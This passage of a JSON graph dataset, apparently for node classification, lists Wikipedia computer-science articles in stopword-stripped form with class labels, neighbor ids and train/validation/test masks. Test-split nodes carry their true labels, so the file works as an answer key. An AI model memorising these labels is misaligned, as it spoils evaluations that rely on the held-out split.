      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8486,
      1191,
      1959,
      937,
      1578,
      5546,
      6057,
      5677,
      7595,
      8870,
      10537,
      3380,
      5431,
      1083,
      2875,
      3900,
      10045,
      196,
      69,
      6212,
      8262,
      11082,
      8907,
      332,
      4685,
      3664,
      2001,
      3409,
      2259,
      8019,
      2901,
      8280,
      5467,
      8285,
      8413,
      479,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      5613,
      8940,
      5620,
      11252,
      7548,
      2045,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 281,
    "label": 3,
    "text": "Puzznic:puzznic puzznic bears strong graphical gameplay similarities taito flipull/plotting game ranked 34th best game time amiga power many clones share basic gameplay puzznic added extra features years puzztrix web pc addled germinal iphone puzzled mobile phones clone pc brix released epic megagames 1992 android devices clone called puzzmagic appeared 2015 iphone clone also available title gem panic blockbusterz hard puzzle game iphone ipad appeared 2019",
    "neighbors": [
      9166
    ],
    "mask": "Test"
  },
  {
    "node_id": 282,
    "label": 2,
    "text": "Tux_Droid:tux droid tux droid linux wireless tux mascot 210mm × 180mm × 140mm lowered wings programmable interface allowing announce events gestures alsa driven sound events detected specific gadgets handled tux gadget manager tux droid supports linux kernel 2.4 later needs 800 mhz cpu 128 mb ram communication tux droid computer via signalling operating 802.11 wlan band compatible wi-fi receiver resembles plastic fish connects host computer usb port infrared remote control supplied signals received tux droid sent host software wireless link media detection needs internet connection mascot driven atmel avr risc microcontrollers new version supports also windows-based pcs tux droid used windows xp windows vista 32 bit kysoh society filed bankruptcy august 2010 official sites unavailable two communities available get help information tux droid mascot comes microphone infrared receiver perform 2.4 ghz wireless full-duplex digital link usb dongle tux droid also light sensor push button top head gestures cover e.g eye- wing-movements switch sensors wings triggered pushing wings sound output volume control wheel control speaker 3.5mm stereo audio socket audio software comes mascot far combines primary gadgets development skype ai alice chat robot tux droid compatible linux windows available 11 languages",
    "neighbors": [
      682,
      8554,
      3533,
      1776,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 283,
    "label": 6,
    "text": "Veritas_Cluster_File_System:veritas cluster file system veritas cluster file system vxcfs cache coherent posix compliant shared file system built based upon veritas file system distributed built-in cluster volume manager vxcvm components veritas storage foundation products particularly veritas cluster server veritas file system veritas volume manager uses underlying mechanisms veritas cluster server manage membership changes cluster state shared file system available following operating systems ibm aix solaris linux hp-ux current version product version 7.3.1 need maintain cluster awareness prevent data corruption discrepancies cache clusters tightly coupled communicate ethernet",
    "neighbors": [
      2314,
      2378,
      2870,
      823,
      1304
    ],
    "mask": "Validation"
  },
  {
    "node_id": 284,
    "label": 9,
    "text": "Nomad_software:nomad software nomad relational database fourth-generation language 4gl originally developed 1970s time-sharing vendor national css still use today widest use 1970s 1980s nomad provides interactive batch environments data management application development including commands database definition data manipulation reporting components accessible integrated database-oriented programming language unlike many tools managing mainframe data geared needs professional programmers mis departments nomad particularly designed sold application end-users large corporations end-users employ nomad batch production cycles web-enabled applications well reporting distribution via web pc desktop nomad distinguished five characteristics nomad language designed simplify application development process especially reporting applications possible common requirements addressed intuitive nonprocedural syntax elements avoid traditional programming heart system list command created report output example database fields state cust_id name phone status balance laid grid two sort breaks via generated columns based data values via across data selection via additional keywords could control subtotals titles footers table lookup myriad reporting details list command somewhat analogous sql select statement incorporates formatting totaling elements helpful tailoring output business requirement select statement contrast essentially data query tool results would processed formatted required using mechanisms distinction highlighted sql classification 'data sublanguage dsl sql powerful formalism controlling data retrieval list command comprehensive report writer addressing broader functionality another example nomad power illustrated nicholas rawlings comments computer history museum ncss see citation reports james martin asked rawlings nomad solution standard problem martin called engineer problem give 6 raises engineers whose job ratings average 7 better martin provided dozen pages cobol page two mark iv informatics rawlings offered following single statement performing set-at-a-time operation show trivial problem nomad rawlings continues martin decided drop idea showing alternative solutions problem nomad solution unbelievable published book 1982 sic 1981 many fine examples nomad look silly today n't reflect nomad really used years since serious mission critical applications used martin engineer problem hundreds nomad classes forced people think terms sets data instead record-at-a-time 'd taught nomad developed national css inc. time stamford connecticut later wilton small team launched 1973 developed supplant ramis previously major ncss offering corporate view nomad importance time – tensions owners ramis – deduced original nomad acronym ncss owned maintained developed unlike ramis largely written fortran nomad written entirely assembler another ramis successor focus evolved competition nomad 4gl platforms oracle competed many customers trying solve end-user information problems without recourse traditional 3gl programming nomad officially released october 1975 although customer usage began may 1975 nomad customer base expanded rapidly new categories users adopted time-sharing data management tools solve problems previously could tackle nomad competed principally focus ramis expanding market nomad claimed first commercial product incorporate relational database concepts seems borne launch dates well-known early rdbms vendors first emerged late 1970s early 80s – oracle 1977 informix 1980 unify 1980 seminal non-commercial research project rdbms concepts ibm system r first installed ibm locations 1977 system r included tested original sql implementation early rdbms vendors able learn numerous papers describing system r late 1970s early 80s nomad released industry events thus like system r nomad drew earlier academic work relational database pioneers e. f. codd early nomad development particular inspired christopher j date influential introduction database systems first published 1975 book technical ideas relational database model included brief mention sequel later sql later editions book included nomad date approval nomad support relational database model time relational database concepts new database systems utilized hierarchical network data models adding relational features nomad original hierarchical design evidently bold move ncss training materials daniel mccracken book cited focused relational database features use rapid application development simple methodology letting end-users design effective normalized relational databases soon added curriculum – later taught campuses throughout country acm lectureship series ncss emeritus lawrence smith ncss thus seen early advocate relational methods position soon eclipsed sql-based vendors burst onto scene nomad flagship ncss product firm years rapid growth going series releases receiving major share publicly traded company r sales support resources ncss time-sharing competitors primarily sold services large corporations time mis departments bogged huge cobol implementation projects see brooks famous mythical man-month contemporary mind-set development backlogs outside services like ncss became attractive tools like nomad made end-users self-sufficient discretionary budgets could get necessary raw data mis departments could solve information problems many users content answer seemingly simple aggregate reporting questions baffled mis departments day – like rank departments profitability end-users went beyond basic reporting build large mission-critical applications either learning necessary skills hiring technicians n't report mis hierarchy ncss developed large support infrastructure including training consulting services foster end-user independence dissatisfaction traditional mis methods resources would later also fuel personal computer revolution turn would displace time-sharing vendors like ncss citations needed illustrate mis departments 70s 80s information center concept end-user empowerment 80s timesharing industry role enabling became known agile companies capable using information competitive advantage topics widely discussed books media day late 1970s ncss developed 'mini-370 product called ncss 3200 primarily intended in-house platform running nomad ncss operating system vp/css see small low-cost system sold end-user 'database machine 'information warehouse extracting analyzing corporate datasets – analogous dedicated mainframes installed ncss larger customer sites despite limited success company lost interest 3200 venture scrapped along vp/css operating system 1982 nomad available ncss proprietary time-sharing system vp/css period exceptions nomad used interactive time-sharing customers via pay-as-you-go dial-up access changed marking start new era nomad made available separate product vm 1982 mvs 1983 still available today latest versions z/vm z/os late 1980s nomad ’ presence expanded pc pc nomad released run dos nomad products continued develop along multiple product lines 1990s support sources data operating systems new version nomad microsoft windows front center released 1993 new versions nomad unix vax also released access oracle sql server data report painter graphical user interface tool writing reports added front center product line rp/server also released 1990s accessing mainframe databases remote databases variety clients including report painter front center applications dde-enabled microsoft windows applications microsoft excel odb/server introduced transparent access odbc-compliant databases front center mainframe front nomad added double-byte character support ran fujitsu operating system qlist added mainframe product line providing user-friendly environment developing sophisticated reports without extensive knowledge nomad syntax nomad remains extremely stable product enhanced keep contemporary needs access oracle sql server data mid-tier platforms full e-mail support additional types output formatted html xml pdf new line products began later 1990s starting rp/web precursor ultraquest applications giving users ability web-enable mainframe nomad applications ultraquest reporter product added line-up late 1990s easy reporting web pc mainframe data via nomad experience gained developing supporting qlist report painter products applied development ultraquest reporter influence clearly visible ultraquest reporter reporter uses java html technology create user-friendly environment provide services basic philosophy nomad language simplify application development reporting processes intuitive powerful syntax carried forward ultraquest products ultraquest reporter applies layer top 4gl make report-building even easier without writing syntax employing intuitive powerful graphical user interface features services make reporting applications data securely available web employee ’ pc dun bradstreet acquired national css 1979 rebranded b computing services dbcs 1986 nomad related assets dbcs sold must software international norwalk connecticut wholly -owned subsidiary thomson-csf became part thomson software products 1995 part aonix 1996 nomad sold maintained select business solutions trumbull connecticut nomad primary status time-sharing product – rather licensed software product – major impact initial design enhancement sales training support first nomad customers inextricably linked national css service offerings capabilities vp/css ncss network nomad released licensed software product acquired large corporations using time-sharing service included exxon nytel large users like bank america socal i.e standard oil california previously negotiated site licenses vp/css datacenters ran nomad vp/css sites eventually migrated vm platform abbott laboratories american express boeing first chicago ic industries motorola also customers later customers new product included ici royal insurance limited client base came opportunity niche suppliers provide independent application development support uk market filled bsl international rcms rex software rcms became uk vendors nomad bsl operated throughout europe us nomad continues used large corporations distributors especially financial health vertical markets",
    "neighbors": [
      6797,
      11024,
      10518,
      6557,
      3358,
      10413,
      5678,
      7217,
      9137,
      10803,
      7733,
      4412,
      8509,
      3004,
      6850,
      11075,
      9286,
      4042,
      11604,
      9813,
      477,
      10340,
      3816,
      5492,
      7797,
      2168
    ],
    "mask": "None"
  },
  {
    "node_id": 285,
    "label": 4,
    "text": "SIGINT_(conference):sigint conference sigint conference three-day conference held yearly social technical aspects digital society 2009 2013 organized chaos computer club held cologne germany conference featured lectures workshops various different topics specifically wanted focus social political aspect technology hacker culture conference officially discontinued january 2014",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 286,
    "label": 3,
    "text": "N.M.A.M._Institute_of_Technology:n.m.a.m institute technology n.m.a.m institute technology nmamit full name nitte mahalinga adyanthaya memorial institute technology autonomous engineering college nitte karnataka india established 1986 programs computer science mechanical engineering civil engineering electrical engineering currently offers b.e biotechnology engineering civil engineering computer science engineering electronics communication engineering electrical electronics engineering information science engineering mechanical engineering college run nitte education trust founded 1979 justice kowdoor sadananda hegde former chief justice supreme court former speaker lok sabha college affiliated visvesvaraya technological university belgaum received autonomous status 2007-08 n.m.a.m institute technology ranked 128th among engineering colleges national institutional ranking framework nirf 2019 college situated village nitte interior area udupi district around 57 kilometers mangalore various departments laboratories hostels located campus",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 287,
    "label": 6,
    "text": "Tux3:tux3 tux3 open-source versioning filesystem created daniel phillips introduced filesystem public replacement tux2 filesystem encountered licensing issues due filing several patents phillips previously created htree directory indexing system eventually became official feature ext3 technical details tux3 first publicized email 23 july 2008 broad outline tux3 follows conventional unix-style inode/file/directory design tux3 inode table b-tree versioned attributes leaves file inode attribute b-tree versioned extents leaves directory indexes mapped directory file blocks htree free space mapped b-tree extents leaves attempts avoid traditional journaling introducing recovery logic allows recover upon remounting tux3 inode variable sized object consisting list attributes labeled version attribute added changed removed b-tree index inodes referenced versioned b-tree index large file also versioned except leaves index contain lists extents labeled version referenced file data added changed style versioning essentially inverse tree versioning methods used write anywhere file layout wafl zfs btrfs multiple tree roots entire filesystem created order express differences versions filesystem claimed advantage tux3 style versioned entities bytes need added represent single changes inode attributes index new versions file data blocks compared number index blocks needing allocated written tree-versioned filesystems august 2008 tux3 capable performing basic file i/o files end 2008 tux3 capable running within kernel able sustain repeated runs file system exerciser fsx-linux big accomplishment 17 february 2009 linux booted tux3 root filesystem first time 18 january 2013 initial fsck support added far checks physical referential integrity developers confident make fully functional e2fsck-quality fsck soon 17 may 2014 daniel phillips made plea kernel maintainer review code implement kernel goal stabilize code kernel finally get stable 9 october 2017 daniel phillips sent tux3 update shardmap mailing list",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      7080,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      7136,
      1509,
      9189,
      7663,
      5106,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 288,
    "label": 2,
    "text": "Android_Cupcake:android cupcake android cupcake version 1.5 third version android developed google major platform release deployable android-powered handsets starting april 2009 longer supported release includes new features users developers well changes android framework api developers android 1.5 platform available downloadable component android sdk android 1.5 included new features on-screen keyboard bluetooth support well improvements existing features ui changes application management several google apps",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8794,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      2001,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 289,
    "label": 4,
    "text": "Robert_L._Prestel:robert l. prestel robert leo prestel born february 11 1936 american intelligence official mathematician deputy director national security agency 1990 1994 time highest ranking civilian agency prestel joined nsa 1962 held many positions prior appointed deputy director including director education training deputy director research engineering among positions prestel served include trustee institute defense analyses board directors wj communications currently serves trustee emeritus institute defense analyses awards prestel received service intelligence community include president distinguished executive award 1988 department defense distinguished civilian service award 1988 national intelligence distinguished service medal 1991",
    "neighbors": [
      7137,
      4898,
      10305,
      11302,
      327,
      266,
      6668,
      365,
      9357,
      4719,
      7887,
      2897,
      1714,
      10832,
      4566,
      2712,
      6749
    ],
    "mask": "Train"
  },
  {
    "node_id": 290,
    "label": 1,
    "text": "Database_machine:database machine database machines back end processor computer special hardware stores retrieves data database specially designed database access coupled main front-end computer high-speed channel database machine tightly coupled main cpu whereas database server loosely coupled via network database machines transfer large packets data mainframe using hundreds thousands microprocessors database software front end processor receives data displays back end processor hand analyzes stores data front end processor back end processors result higher performance increasing host main memory increasing database recovery security decrease cost manufacture database machine contrasts database server computer local area network holds database according julie a. mccann currently dbms controls organisation storage retrieval data whilst regulating security integrity database accepts requests data application programs instructs operating system os transfer appropriate data example ibm system/38",
    "neighbors": [
      2688,
      9481,
      10505,
      9467,
      10258,
      10518,
      4376,
      9112,
      7968,
      8353,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      11596,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 291,
    "label": 2,
    "text": "BlackDog:blackdog blackdog pocket-sized self-contained computer built-in biometric fingerprint reader developed 2005 realm systems plugged powered usb port host computer using peripheral devices input output mobile personal server allows user use linux ones applications data computer usb port host machine ’ monitor keyboard mouse internet connection used blackdog duration session system self-contained isolated host requiring additional installation possible make use untrusted computers yet using secure system various hardware iterations exist original developer realm systems closed 2007 picked successor inaura inc identified blackdog project blackdog original blackdog first hardware version touted unlike mobile computing device blackdog contains processor memory storage completely powered usb port host computer external power adapter required created conjunction realm system project blackdog skills contest announced oct 27 2005 supposed raise interest create developer community surrounding product blackdog publicly available purchase project blackdog website september 2005 wished enter contest experiment platform production ended mid january 2006 contest closed 7 february 2006 winners contest announced categories security michael chenetz entertainment michael king productivity terry bayne dogpile paul chandler feb 15 2006 open source business conference san franscisco terry bayne announced grand prize winner contest received usd50,000 creation kibble tool building integration solutions host pc blackdog device using soap-based rpc mechanism send arbitrary lua code executed host pc blackdog conference second iteration blackdog k9 publicly announced identified k9 ultra-mobile server k9 version announced open source business conference february 2006 expected availability third quarter 2006 however company turbulences see company history prevented k9 sold early 2009 inaura inc promotional literature shows form factor intermediate id3 prototype thin chrome model resembling ipod nano black rubberized exterior realm systems shut working prototypes k9 hardware design seemed finished software functional terms hardware differed original blackdog aspects id3 variant k9 using hardware specifications intended corporate use matching management router/server identified id1200 announced part identity product series instance showcased embedded systems conference san jose ca april 3–7 2006 final realm systems id3 form factor resembled small nokia cellphone software originally based debian 2008 project switched using olmec linux plugged usb port windows xp machine blackdog initially presented host virtual cd-rom drive via autorun application blackdog automatically launched x window system windows xming software nat router applications running virtual usb cd-rom drive disconnected usb presented virtual ethernet adapter enabling network access without requiring installations user interactions user could access contained applications data windows computer configuration steps possible also run blackdog linux mac computers short engadget review stated runs firefox fine great taking browser e-mail chat clients use wherever are\\ though probably little 400mhz guy handle first software version based debian sid running 2.6.10 kernel contained sample default applications xterm xblast xgalaga allowed installation firefox webbrowser email client additional software available official community apt repositories hosted project attempted stimulate creation applications use cases blackdog building community project discussion infrastructure termed dogpound used installation project hosting software sourceforge sdk qemu emulator environment windows xp linux mac os x released facilitate creation porting applications blackdog system although blackdog software free software device contained proprietary technology intellectual property developed realm systems inc. later transferred echo identity systems finally ended belonging inaura corporation official repository project disappeared mid-february 2007 due realm systems inc. closing reactivated successor inaura inc. late-june 2007 seem repository nov. 2011 sometime 2009 michael king winner entertainment category contest maintained independent backup official repositories discussion groups well repositories developers now-defunct saint louis mo based archlug website official website project www.projectblackdog.org still appears december 2013 defaced several quick cash money lenders compromised site via wordpress content management system uses appear original content remaining homepage advertisements money lending sites starting late 2007 olmec linux ported blackdog k9 devices. debian-derived linux distribution geared small embedded platforms gumstix sold part inaura inc. product offering blackdog/k9 using olmec-based version realm systems inc. founded 2002 based salt lake city utah raising 8.5 million led gmg capital round ceo rick white describing provid\\ ing\\ next generation mobile enterprise platform simplifies delivery applications services end-users across distributed enterprise 2006 realm systems focuses id3 line products k9 product launch put indefinitely january 2007 two then-unidentified groups containing former realm systems employees investors attempted independently license move k9 hardware software separate company continue development production due dissolution realm systems continued developer community interest concept well rumored successful pilot programs one realm systems backers posted public foreclosure notice court-supervised foreclosure hearing number investors bid company assets closed bid result realm assets including id3 k9-series hardware operating systems enterprise management router code bought new firm echo identity systems registered salt lake city company february 1 2007 company claimed continuing enterprise product line re-used nearly old realm systems website layout graphics mention k9 product line made anywhere echo identity systems website former realm systems website redirected id3 blackdog customers transitional support website informing asset change realm systems closing product support would done echo identity systems though explanation extent support provided appears assets soon bought back echo identity systems group investors backed former realm systems employees investors based unconfirmed community reports september 2007 appears new developer prototypes k9 seeded project blackdog contest winners november 2007 new owners emerged inaura inc ceo president peter bookman one original co-founders realm systems cfo new company rodney rasmussen registered echo identity systems inaura utah company set sparse web site lacking specific product descriptions inaura inc. describes formerly known real systems inc. echo identity systems expired company june 2008 2008 aurora inc. website updated provide details company product k9 device branded k9 ultra mobile authentication key umak marketed solving problem trust within computing environments refers two iterations umaks k9 blackdog k9 product seems publicly sold since early 2009 february 2010 company name expired failing file renewal re-registered september 2011. expiring january 2013",
    "neighbors": [
      8899,
      3911,
      4777,
      7983,
      1776,
      1682,
      823,
      6618,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 292,
    "label": 2,
    "text": "FreeDOS:freedos freedos formerly free-dos pd-dos free operating system ibm pc compatible computers intends provide complete dos-compatible environment running legacy software supporting embedded systems freedos booted floppy disk usb flash drive designed run well virtualization x86 emulation unlike versions ms-dos freedos composed free open-source software licensed terms gnu general public license therefore base distribution require license fees royalties creation custom distributions permitted however packages form part freedos project include non-gpl software considered worth preserving 4dos distributed modified mit license freedos project began 29 june 1994 microsoft announced would longer sell support ms-dos jim hall time student posted manifesto proposing development pd-dos public domain version dos within weeks programmers including pat villani tim norman joined project kernel villani command.com command line interpreter villani norman core utilities hall created pooling code written found available project maintained morgan hannibal toal many official pre-release distributions freedos final freedos 1.0 distribution gnu/dos unofficial distribution freedos discontinued version 1.0 released freedos 1.1 released 2 january 2012 available download cd-rom image limited install disc contains kernel basic applications full disc contains many applications games networking development etc available newer fuller 1.2 legacy version 1.0 2006 consisted two cds one 8mb install cd targeted regular users larger 49mb live cd also held source code project freedos used several companies freedos also used multiple independent projects freedos requires pc/xt machine least 640 kb memory programs bundled freedos often require additional system resources freedos mostly compatible ms-dos supports com executables standard dos executables borland 16-bit dpmi executables also possible run 32-bit dpmi executables using dos extenders operating system several improvements relative ms-dos mostly involving support newer standards technologies exist microsoft ended support ms-dos internationalization advanced power management tsrs furthermore use hx dos extender many windows console applications function properly freedos rare gui programs like qemm bochs freedos able run microsoft windows 1.0 2.0 releases windows 3.x releases support i386 processors fully run 386 enhanced mode except partially experimental freedos kernel 2037 problems running windows result microsoft efforts prevent products running non-microsoft dos implementations windows 95 windows 98 windows use stripped-down version ms-dos freedos used replacement undocumented interfaces ms-dos 7.0-8.0 windows 4.xx emulated freedos however installed used beside systems using boot manager program bootmgr metakern included freedos windows nt-based operating systems including windows 2000 xp vista 7 desktops windows server 2003 2008 2008 r2 servers make use ms-dos core component system systems make use fat file systems used ms-dos earlier versions windows however typically use ntfs new technology file system default security reasons freedos co-exist systems separate partition partition fat systems freedos kernel booted adding windows 2000 xp nt boot loader configuration file boot.ini freeldr.ini equivalent reactos fat32 fully supported preferred format boot drive depending bios used four logical block addressing lba hard disks 128 gb 2 tb size supported little testing large disks bioses support lba produce errors disks larger 32 gb driver ontrack ez-drive resolves problem freedos also used driver called lfndos enable support windows 95-style long file names old programs windows 95 support lfns even driver loaded unless recompiled planned support ntfs ext2 exfat several external third-party drivers available purpose access ext2 file systems ltools counterpart mtools sometimes used copy data ext2 file system drives blinky fish mascot freedos designed bas snabilie",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      546,
      9762,
      5158,
      7217,
      8241,
      9784,
      10809,
      576,
      10306,
      5702,
      8262,
      1101,
      2637,
      10333,
      97,
      10851,
      9320,
      8298,
      8301,
      10352,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6281,
      6797,
      2193,
      10387,
      2197,
      9366,
      6296,
      8857,
      7325,
      9887,
      3248,
      178,
      6837,
      8388,
      9932,
      8909,
      5840,
      7382,
      8410,
      10971,
      9953,
      6371,
      1253,
      7914,
      5359,
      5363,
      3834,
      2811,
      10499,
      4870,
      5384,
      1804,
      3856,
      273,
      4369,
      11539,
      6939,
      10016,
      808,
      2345,
      7983,
      2864,
      823,
      4409,
      7483,
      11075,
      8517,
      4423,
      8522,
      5457,
      11601,
      4441,
      10590,
      8551,
      5492,
      1400,
      1408,
      3969,
      3970,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      3496,
      6062,
      7088,
      11184,
      954,
      6075,
      6078,
      9151,
      6082,
      8136,
      9166,
      8147,
      4074,
      1515,
      5612,
      6128,
      2545,
      6129,
      499,
      5619,
      7152,
      8692,
      4089,
      10235,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 293,
    "label": 0,
    "text": "Message_Understanding_Conference:message understanding conference message understanding conferences muc initiated financed darpa defense advanced research projects agency encourage development new better methods information extraction character competition—many concurrent research teams competing one another—required development standards evaluation e.g adoption metrics like precision recall first conference muc-1 could participant choose output format extracted information second conference output format participants' systems would evaluated prescribed topic fields given filled information text typical fields example cause agent time place event consequences etc number fields increased conference conference sixth conference muc-6 task recognition named entities coreference added named entity phrases text supposed marked person location organization time quantity topics text sources processed show continuous move military civil themes mirrored change business interest information extraction taking place time",
    "neighbors": [
      5778,
      2059,
      5781,
      2103
    ],
    "mask": "Test"
  },
  {
    "node_id": 294,
    "label": 2,
    "text": "David_Korn_(computer_scientist):david korn computer scientist david g. korn b. brooklyn august 28 1943 american unix programmer author korn shell ksh command line interface/programming language david korn received undergraduate degree mathematics rensselaer polytechnic institute 1965 ph.d. applied mathematics nyu courant institute mathematical sciences 1969 working computer simulations transsonic airfoils developing korn airfoil switched fields computer science became member technical staff bell laboratories 1976 developed korn shell response problems colleagues commonly used shells time bourne shell c shell korn shell pioneered practice consultative user interface design input unix shell users mathematical cognitive psychologists user interface included choice editing styles choices included styles based vi two variants emacs incorporated copied subsequent unix shells korn shell backward-compatible bourne shell takes lot ideas c shell history viewing vi-like command line editing microsoft included version korn shell produced mortice kern systems mks unix integration package windows nt version compatible ksh88 korn shell specification korn mentioned question answer period microsoft presentation usenix nt conference seattle 1998 greg sullivan microsoft product manager participating presentation knowing commenter insisted microsoft indeed chosen real korn shell polite debate ensued sullivan continuing insist man giving criticisms mistaken compatibility issues sullivan backed audience member stood mentioned man making comments none eponymous david korn along korn shell also known creator uwin x/open library win32 systems similar later cygwin korn kiem-phong vo also co-developed sfio library managing i/o streams korn became bell labs fellow 1984 currently lives new york city 2013 worked labs research florham park new jersey working google david korn son adam works goldman sachs",
    "neighbors": [
      7872,
      8262,
      8976,
      11442,
      1783,
      8671
    ],
    "mask": "Train"
  },
  {
    "node_id": 295,
    "label": 2,
    "text": "LXC:lxc lxc linux containers operating-system-level virtualization method running multiple isolated linux systems containers control host using single linux kernel linux kernel provides cgroups functionality allows limitation prioritization resources cpu memory block i/o network etc without need starting virtual machines also namespace isolation functionality allows complete isolation application view operating environment including process trees networking user ids mounted file systems lxc combines kernel cgroups support isolated namespaces provide isolated environment applications early versions docker used lxc container execution driver though lxc made optional v0.9 support dropped docker v1.10 lxc provides operating system-level virtualization virtual environment process network space instead creating full-fledged virtual machine lxc relies linux kernel cgroups functionality released version 2.6.24 also relies kinds namespace isolation functionality developed integrated mainline linux kernel originally lxc containers secure os-level virtualization methods openvz linux kernels 3.8 root user guest system could run arbitrary code host system root privileges much like chroot jails starting lxc 1.0 release possible run containers regular users host using unprivileged containers ref name= lxc-1-0-security-features/ /ref unprivileged containers limited access hardware directly however even privileged containers provide adequate isolation lxc 1.0 security model properly configured lxc similar os-level virtualization technologies linux openvz linux-vserver well operating systems freebsd jails aix workload partitions solaris containers contrast openvz lxc works vanilla linux kernel requiring additional patches applied kernel sources version 1 lxc released long-term supported version intended supported five years",
    "neighbors": [
      6150,
      4616,
      2058,
      3082,
      5139,
      10780,
      10785,
      9762,
      6180,
      8242,
      9266,
      7733,
      4161,
      5697,
      8772,
      6213,
      5702,
      8268,
      589,
      7248,
      593,
      2645,
      1632,
      10851,
      6244,
      5222,
      9320,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      11410,
      2195,
      10387,
      2711,
      6808,
      9882,
      1694,
      2723,
      2212,
      4777,
      8364,
      7349,
      10933,
      5815,
      700,
      2236,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      2259,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      9964,
      10482,
      2294,
      8439,
      2809,
      3323,
      8700,
      5378,
      6918,
      4360,
      1291,
      4367,
      8466,
      792,
      10016,
      6438,
      10537,
      7983,
      11568,
      9525,
      823,
      6968,
      7992,
      318,
      3911,
      4423,
      8520,
      6988,
      10063,
      1362,
      7507,
      5975,
      11095,
      2910,
      4958,
      8554,
      10091,
      7540,
      1399,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      5523,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9655,
      5049,
      9667,
      8136,
      457,
      11221,
      7134,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      499,
      2036,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 296,
    "label": 4,
    "text": "PRTG_Network_Monitor:prtg network monitor prtg network monitor paessler router traffic grapher version 7 agentless network monitoring software paessler ag monitor classify system conditions like bandwidth usage uptime collect statistics miscellaneous hosts switches routers servers devices applications first version prtg released 29 may 2003 german company paessler gmbh paessler ag founded dirk paessler 2001 prtg network monitor auto-discovery mode scans predefined areas enterprise network creates device list data next step information detected devices retrieved using various communication protocols typical protocols ping snmp wmi netflow jflow sflow also communication via dicom restful api possible tool available windows systems addition paessler ag offers cloud-based monitoring solution prtg hosted paessler software based sensors configured specific purpose example http smtp/pop3 e-mail application sensors hardware-specific sensors switches routers servers prtg network monitor 200 different predefined sensors retrieve statistics monitored instances e.g response times processor memory database information temperature system status software operated completely via ajax-based web interface web interface suitable real-time troubleshooting data exchange non-technical staff via maps dashboards user-defined reports additional administration interface form desktop application windows macos available addition usual communication channels email sms notification also provided via push notification smartphones using app ios android prtg also offers customizable reports prtg network monitor licensing based sensors devices require 5-10 sensors fully monitored version 100 integrated sensors available free charge",
    "neighbors": [
      4771,
      6281,
      1802,
      6797,
      7983,
      8692,
      11126,
      3133
    ],
    "mask": "Test"
  },
  {
    "node_id": 297,
    "label": 4,
